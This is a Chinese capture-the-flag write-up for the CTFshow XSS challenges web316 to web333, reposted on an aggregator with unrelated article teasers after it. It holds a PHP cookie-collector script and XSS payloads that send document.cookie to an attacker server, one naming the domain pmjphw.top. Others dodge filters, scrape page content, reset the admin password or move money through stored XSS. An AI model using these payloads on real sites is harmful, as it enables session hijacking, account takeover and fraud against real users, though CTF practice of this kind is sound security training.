CTFshow--web--xss

目录

web316

web317~319

web320~326

web327

web328

web329

web330

web331

web332

web333


先在自己的服务器写上代码

<?php$content = $_GET[1];
if(isset($content)){file_put_contents('flag.txt','$content');
}else{echo 'no data input';
}

要拿到管理员的cookie , 而不是自己的

web316

<script>document.location.href="[ip]/x.php?1="+document.cookie</script>

web317~319

有了过滤

<body οnlοad="window.location.href='http://[ip]/x.php?1='+document.cookie">

web320~326

过滤了空格

<body/οnlοad="window.location.href='[ip]/x.php?1='+document.cookie">
 

web327

存储型xss

在信的内容那里输入
<script>document.location.href='http://pmjphw.top/x.php?1='+document.cookie</script>

web328

注册的地方
注册一个密码为XSS Payload
<script>document.location.href='[ip]?1='+document.cookie</script>

就可以在自己的服务器上得到 管理员的cookie
在网页上将自己的cookie换掉 就可以进入到用户管理界面了 ,里面存在flag
但是一进入到里面就会跳转, 只能看到一瞬间的flag , 所以还需要进行抓包查看

多抓包了几次 , 搞了一下, 好像也进入到这个界面了, 没有跳转

web329

用上一个方法拿cookie的话没有用, 已经失效了,登录不上

直接拿内容
 

<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerHTML.indexOf('ctf'+'show{')>-1)
{window.location.href='[ip]/x.php?1='+value.innerHTML;}});</script>

web330

有一个修改密码的模块
在修改密码的那里 写入xss payload

<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

然后 admin  /  123   登录
然后进入到用户管理界面

速度快一点, 两秒左右就会跳转走

web331

在注册的用户名处写入 xss   payload

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

然后 admin  /  123   登录

web332

先注册一个123的用户登录
然后再注册一个 xss payload  的用户

123的用户就可以收到钱了

<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

web333

跟上一题一样

<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

CTFSHOW-XSS - Boogiepop Doesn't Laugh
ctfshow-XSS篇 - 简书
https://juejin.cn/post/7083663044865163277

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/46801.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》

2024年7月16日&#xff0c;国内网络安全专业媒体——嘶吼安全产业研究院正式发布《嘶吼2024网络安全产业图谱》(以下简称“产业图谱”)。 本次发布的产业图谱&#xff0c;共涉及七大类别&#xff0c;127个细分领域。全面展现了网络安全产业的构成和重要组成部分&#xff0c;探…

【虚幻引擎】C++网络通信TCP和HTTP实战开发全流程,以接入科大讯飞星火大模型和文心一言千帆大模型为案例讲解

本套课程介绍了使用我们的虚幻C去写开发我们的插件开发&#xff0c;如何使用我们的虚幻C 封装我们的TCP和HTTP&#xff0c;如何使用的我们虚幻C子系统&#xff0c;如何根据第三方文档去写接口请求&#xff0c;如何通过我们的加密算法去签名我们的URL&#xff0c;如何声明我们的…

通义千问AI模型对接飞书机器人-集成飞书机器人(2-2)

接上一篇 通义千问AI模型对接飞书机器人-模型配置&#xff08;2-1&#xff09; 1、通过飞书机器人对接ai的在线接口 参考文档&#xff1a;发送 HTTP 请求 1.1 创建飞书应用 创建流程 配置http请求 http请求地址上一篇百炼平台配置的应用地址 1.2 企业自建应用对接AI 添加应用…

判断用户输入IP的合法性判断输入IP与本机IP是否在同一网段C++QT

目录 一、任务目标 二、判断用户输入IP的合法性 三、判断用户输入IP与本机IP是否在同一网段 一、任务目标 1、判断用户输入IP的合法性&#xff0c;例如是否不符合IP地址的正确格式&#xff1b; 2、判断用户输入IP与本机IP是否在同一网段&#xff1b; 3、使用C和QT实现&…

Nacos 服务发现(订阅)源码分析(服务端)

前言&#xff1a; 前文我们分析了 Nacos 服务发现&#xff08;订阅&#xff09;的流程&#xff0c;从 Nacos Client 端的源码分析了服务发现的过程&#xff0c;服务发现最终还是要调用 Nacos Server 端来获取服务信息&#xff0c;缓存到客户端本地&#xff0c;并且会定时向 Na…

HumanitZ人道主义z用服务器开服教程

1、登录服务器&#xff08;百度莱卡云&#xff09; 进入控制面板后会出现正在安装的界面&#xff0c;安装大约5分钟&#xff08;如长时间处于安装中请联系我们的客服人员&#xff09; 2、修改查询端口 点击网络&#xff0c;两个端口已经创建完成 复制不是首选的端口&#xff…

入门 git

目录 文章简介1. git 是什么2. 为什么要用 git3. git 入门操作4. git 的来源简述&#xff08;拓展&#xff09; 文章简介 本篇文章主要介绍命令行下的 git 的入门操作&#xff08;本地 – 远端仓库的推送拉取&#xff09;&#xff0c;以及简单理解什么是 git&#xff0c; 为什…

无需标注即可训练,自监督学习框架实现大量未标注毫米波雷达数据预训练自动驾驶感知任务

Abstract 由于雷达&#xff08;radar&#xff09;在雾天和恶劣天气下的操作能力&#xff0c;自动驾驶车辆使用雷达进行感知引起了越来越多的研究兴趣。然而&#xff0c;训练雷达模型受到大规模雷达数据注释的成本和难度的阻碍。为了克服这一瓶颈&#xff0c;我们提出了一种自监…

python pandas处理股票量化数据:笔记4

更新日线数据到最新日期&#xff0c;下面是深发展&#xff08;平安银行&#xff09;更新到20240715以后的stock_daily表。因为积分不够&#xff0c;无法下载tushare.pro接口的通用复权行情数据&#xff0c;只能使用旧的日线数据接口pro.daily&#xff0c;下载的数据没有日线复权…

驱动开发系列04-中断处理

目录 一:概述 二:启用中断 三:注册中断处理程序 四:自动检测中断号 五:快中断与慢中断 六:中断处理程序 七:处理参数和返回值 八:禁用中断 九:上半部和下半部 Tasklets Workqueues 十:共享中断 一:概述 虽然有时候只需使用I/O端口就能控制设备了,但大多…

事务失效的几种情况

一、事务管理的基本概念 事务有四个重要特性&#xff0c;称为ACID特性&#xff1a; Atomicity(原子性)&#xff1a;事务中的所有操作要么全部完成&#xff0c;要么全部不完成。Consistency(一致性)&#xff1a;事务完成后&#xff0c;数据要处于一致的状态Isolation(隔离性)&…

如何在电脑上演示手机上APP,远程排查移动端app问题

0序&#xff1a; 对接客户&#xff0c;给领导演示移动端产品&#xff0c;或者远程帮用户排查移动端产品的问题。都需要让别人能够看到自己在操作手机。 会议室可以使用投屏&#xff0c;但需要切换电脑和手机。 排查问题经常都是截图、或者手机上录制视频&#xff0c;十分繁琐…

Windows图形界面(GUI)-DLG-C/C++ - 滑动条(Trackbar)

公开视频 -> 链接点击跳转公开课程博客首页 -> ​​​​​​链接点击跳转博客主页 目录 滑动条(Trackbar) 使用场景 初始控件 控件消息 示例代码 滑动条(Trackbar) 使用场景 音量控制 亮度调节 视频播放进度控制 任何需要用户在特定范围内选择值的场景 初始控…

恶补,先验分布,后验分布 ,似然估计

恶补&#xff0c;打一遍增加印象 先验分布后验分布&#xff0c;似然估计 声明&#xff1a;仅记录个人学习&#xff0c;并无其他用途。 先验分布 后验分布&#xff0c; 似然估计 隔壁小哥的故事&#xff1a; 隔壁小哥要去15公里外的一个公园里玩&#xff0c;小哥可以选择步行…

【BUG】已解决:ModuleNotFoundError: No module named ‘PIL‘

已解决&#xff1a;ModuleNotFoundError: No module named ‘PIL‘ 目录 已解决&#xff1a;ModuleNotFoundError: No module named ‘PIL‘ 【常见模块错误】 错误原因&#xff1a; 解决办法&#xff1a; 欢迎来到英杰社区https://bbs.csdn.net/topics/617804998 欢迎来到我…

离散型随机变量为何不是左连续?

目录 离散型随机变量 引言 离散型随机变量的定义和性质是什么&#xff1f; 定义 性质 如何证明离散型随机变量的分布函数在每个可能取值处不具有左连续性&#xff1f; 离散型随机变量的阶梯状分布函数是如何影响其左连续性的&#xff1f; 在统计学中&#xff0c;有哪些方…

web前端面向对象面试25题

1 . 简述面向对象&#xff1f;主要特征是什么&#xff1f; 参考回答&#xff1a; 面向对象是一种对现实世界理解和抽象的方法&#xff0c;是计算机编程技术发展到一定阶段后的产物&#xff0c;是一种是软件开发方法面向对象主要有四大特性&#xff1a; 1、抽象 忽略一个主题中…

微信小程序-自定义组件生命周期

一.created 组件实例创建完毕调用。定义在lifetimes对象里。 不能在方法里面更改data对象里面的值&#xff0c;但是可以定义属性值。 lifetimes:{//不能给data设置值created(){this.testaaconsole.log("created") }}二. attached 模板解析完成挂载到页面。 可以更…

Gitee 使用教程1-SSH 公钥设置

一、生成 SSH 公钥 1、打开终端&#xff08;Windows PowerShell 或 Git Bash&#xff09;&#xff0c;通过命令 ssh-keygen 生成 SSH Key&#xff1a; ssh-keygen -t ed25519 -C "Gitee SSH Key" 随后摁三次回车键&#xff08;Enter&#xff09; 2、查看生成的 SSH…

Carousel of Combinations

由圆排列的公式&#xff0c;不难有 C ( n , k ) ( k n ) k ! k C(n,k)(_k^n)\times \frac{k!}{k} C(n,k)(kn​)kk!​ 于是答案为 ∑ i 1 n ∑ j 1 i ( ( j i ) ⋅ ( j − 1 ) ! ) m o d j \sum_{i1}^{n}\sum_{j1}^{i}((_j^i)\cdot (j-1)!)mod\space j ∑i1n​∑j1i​((ji​…